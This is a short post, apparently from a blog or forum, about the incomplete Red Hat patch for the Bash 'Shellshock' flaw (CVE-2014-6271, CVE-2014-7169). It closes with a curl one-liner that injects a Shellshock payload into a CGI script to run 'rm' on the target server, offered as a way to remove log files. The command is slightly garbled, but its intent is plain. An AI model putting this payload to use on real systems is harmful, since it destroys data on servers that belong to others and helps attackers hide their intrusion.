RedHat still vulnerable to Bash shellcode

RedHat customer portal

Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169.


This issue (CVE 2014-6271) has not been resolved on RedHat Operating systems (i.e. no patch yet)


Once finding a cgi script (poc.cgi) you can remove the log files with this:


curl A “() { :; }; /bin/rm /var/www/target”